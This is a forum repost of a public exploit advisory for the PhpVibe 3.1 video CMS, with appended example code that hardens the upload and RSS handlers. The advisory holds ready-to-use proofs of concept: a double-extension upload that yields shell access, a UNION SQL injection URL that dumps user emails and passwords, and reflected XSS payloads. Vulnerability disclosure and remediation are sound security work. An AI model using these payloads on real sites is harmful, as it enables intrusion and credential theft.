PhpVibe 3.1 Video Upload - SQL - XSS Vulnerabilities
#1
Code:
###########################################################################################
#Exploit Title: PhpVibe 3.1 - Multiple Vulnerabilities
#Product: PhpVibe
#Official site: http://phprevolution.com/
#Risk Level: High
#Exploit Author: Esac
#Last Checked: 23/08/2013
###########################################################################################


+----------+
| OVERVIEW |
+----------+

PhpVibe is a Premium video sharing cms with or without upload. Supports all main video sharing websites like Youtube, Vimeo, Dailymotion, Metacafe… and flv, mp4, mp3 uploads. No ffmpeg required. Upload option can be turned off.

+-----------------------------------------------------------------------------------+


+-------------------------------------+
| Remote Arbitrary File Upload Vuln   |
+-------------------------------------+


Affected file : upload.php


...............................................


    if ($_FILES['file']['name']!='') {
    $fileName= $_FILES['file']['name'];
    $fileSize = $_FILES['file']['size'];
    $ext = substr($fileName, strrpos($fileName, '.') + 1);
    if (in_array($ext,$allowedExts) or empty($allowedExts)) {
        if ($fileSize<$maxFileSize or empty($maxFileSize)) {
    $target_path = $target_path . basename( $_FILES['file']['name']);
    if(move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) {
        echo '{"success":true, "file": "'.$target_path.'"}';
            vinsert(basename( $_FILES['file']['name']),basename( $_FILES['file']['name']));
    } else{
        echo '{"success":false, "details": "move_uploaded_file failed"}';
    }
} else { echo('{"success":false, "details": "Maximum file size: '.ByteSize($maxFileSize).'."}'); };
} else echo('{"success":false, "details": "File type '.$ext.' not allowed."}');
} else echo '{"success":false, "details": "No file received."}';


real exploitation :

to exploit this vuln, u must be a registered user and go to upload video area

http://server/upload

upload ur evil file as evil.php.mp3 or file.php.mp4 or file.php.flv

Shell access :

http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3

Demo :

server/media/flv/august-23-13-5-10-pm-evil.php.flv


+-----------------------------------------------------------------------------------+


+---------------+
| SQL Injection |
+---------------+
  
PhpVibe is possibly vulnerable to SQL Injection attacks , affected file : rss.php , param : cat

affected code :

//rss.php , line 24

function clean_feed($input)
{
    $original = array("<", ">", "&", '"', "'", "<br/>", "<br>");
    $replaced = array("&lt;", "&gt;", "&amp;", "&quot;", "&apos;", "", "");
    $newinput = str_replace($original, $replaced, $input);
    
    return $newinput;
}


echo'<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
';
echo '
<title>'.$seo_title.'</title>
<description>'.$seo_desc.'</description>
<link>'.$site_url.'</link>
';
if($cat = MK_Request::getQuery('cat')) {
$vbox_result = dbquery("select * from videos WHERE category ='".$cat."' > 0 ORDER BY id DESC limit 0, 30");
} else {
$vbox_result = dbquery("select * from videos WHERE views > 0 ORDER BY id DESC limit 0, 30");
}
while($videosData = mysql_fetch_array($vbox_result))
{
    $url = $site_url.'video/'.$videosData["id"].'/'.seo_clean_url($videosData['title']) .'/';
    $rss_datetime = $videosData["date"];
echo '
     <item>
<title>'.strip_tags($videosData['title']).'</title>
<link><![CDATA['.$url.']]></link>
<guid><![CDATA['.$url.']]></guid>
<pubDate>'.$rss_datetime.'</pubDate>
<description>[CDATA['.clean_feed($videosData["description"]).' ]]</description>
</item>
      
     ';

}

echo'</channel>



Poc :

http://server/rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--


+--------------------------------------------------------------------------------------+

+-----------+
|XSS Attack |
+-----------+

Multiple XSS vulnerabilities have been detected in phpVibe 3.1

1) Input appended via the URL to show/ is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example :
http://server/show/'">><marquee><h1>XSS</h1></marquee>



2) Input passed to the "email" parameter in forgot-pass.php, login.php, and register.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 3.1. Other versions may also be affected.


example :

http://server/forgot-pass.php   => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/login.php         => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/register.php      => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>

+--------------------------------------------------------------------------------------+

Knowledge is not an object , it's a flaw :)
Greetz : White Tarbouch TEAM - Cobra
www.Iss4m.ma
./Issam IEBOUBEN Aka Esac

Source =>
Code:
http://www.exploit-db.com/exploits/27872/
www.deccal.org
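
Added example (not part of the original post or of PhpVibe's code): a hardened form of the upload.php check quoted in the advisory. The quoted code validates only the last extension and keeps the client's file name, so a name like file.php.mp3 reaches disk unchanged, and a web server that picks handlers from any extension in the name may treat it as PHP. store_upload(), the MIME allow-list and the 50 MB limit are assumptions made for illustration.

```php
<?php
// Added example: hardened variant of the upload.php check quoted above.
// store_upload() and the MIME map are assumptions made for this sketch.

function store_upload(array $file, string $targetDir, int $maxFileSize): array
{
    // Extension => MIME types accepted for it (constructed allow-list).
    $allowed = [
        'flv' => ['video/x-flv'],
        'mp4' => ['video/mp4'],
        'mp3' => ['audio/mpeg'],
    ];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return ['success' => false, 'details' => 'No file received.'];
    }
    if ($file['size'] > $maxFileSize) {
        return ['success' => false, 'details' => 'File too large.'];
    }

    // The final extension is used only to pick the stored suffix.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return ['success' => false, 'details' => 'File type not allowed.'];
    }

    // Check the content, not just the client-supplied name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, $allowed[$ext], true)) {
        return ['success' => false, 'details' => 'Content does not match type.'];
    }

    // Server-generated name: no part of the client file name reaches disk,
    // so a second extension such as ".php" cannot be carried along.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($targetDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return ['success' => false, 'details' => 'move_uploaded_file failed'];
    }
    return ['success' => true, 'file' => $stored];
}

header('Content-Type: application/json');
echo json_encode(store_upload($_FILES['file'] ?? [], __DIR__ . '/media/flv', 50 * 1024 * 1024));
```

Independently of the handler, the media directory should be served with script execution disabled.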
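
Added example (not part of the original post or of PhpVibe's code): the rss.php category lookup from the advisory rewritten so that `cat` is validated and bound as a parameter instead of being concatenated into the SQL string. Table and column names come from the quoted code; fetch_feed_rows(), the numeric-category assumption and the in-memory SQLite data standing in for the site's MySQL database are constructed for illustration.

```php
<?php
// Added example, not PhpVibe code. Table/column names come from the quoted
// rss.php; fetch_feed_rows() and the in-memory SQLite data are constructed.

function fetch_feed_rows(PDO $db, $cat): array
{
    $sql = 'SELECT id, title, description, date FROM videos WHERE ';
    $params = [];
    if (is_string($cat) && $cat !== '') {
        // Category is treated as a numeric id (assumption); reject the rest.
        if (!ctype_digit($cat)) {
            return [];
        }
        $sql .= 'category = :cat';
        $params[':cat'] = (int) $cat;
    } else {
        $sql .= 'views > 0';
    }
    // The value travels as a bound parameter, never as part of the SQL text.
    $stmt = $db->prepare($sql . ' ORDER BY id DESC LIMIT 30');
    foreach ($params as $name => $value) {
        $stmt->bindValue($name, $value, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed stand-in for the site's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE videos (id INTEGER PRIMARY KEY, title TEXT,
           description TEXT, date TEXT, category INTEGER, views INTEGER)');
$db->exec("INSERT INTO videos VALUES
           (1, 'Intro <b>clip</b>', 'First & only', '2013-08-23', 1, 10),
           (2, 'Other', 'Second', '2013-08-23', 2, 0)");

foreach (['1', "1' OR '1'='1", ['1']] as $cat) {      // constructed inputs
    $rows = fetch_feed_rows($db, $cat);
    echo json_encode($cat), ' => ', count($rows), " row(s)\n";
    foreach ($rows as $row) {
        // Encode for XML on output instead of a hand-rolled str_replace().
        echo '<title>', htmlspecialchars(strip_tags($row['title']),
             ENT_XML1 | ENT_QUOTES, 'UTF-8'), "</title>\n";
    }
}
```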

